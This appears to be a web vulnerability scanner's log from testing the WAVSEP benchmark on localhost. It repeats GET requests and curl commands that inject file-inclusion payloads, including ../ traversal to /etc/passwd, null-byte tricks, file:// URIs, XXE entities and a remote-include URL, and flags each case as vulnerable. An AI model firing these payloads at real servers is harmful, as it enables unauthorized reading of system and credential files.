GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

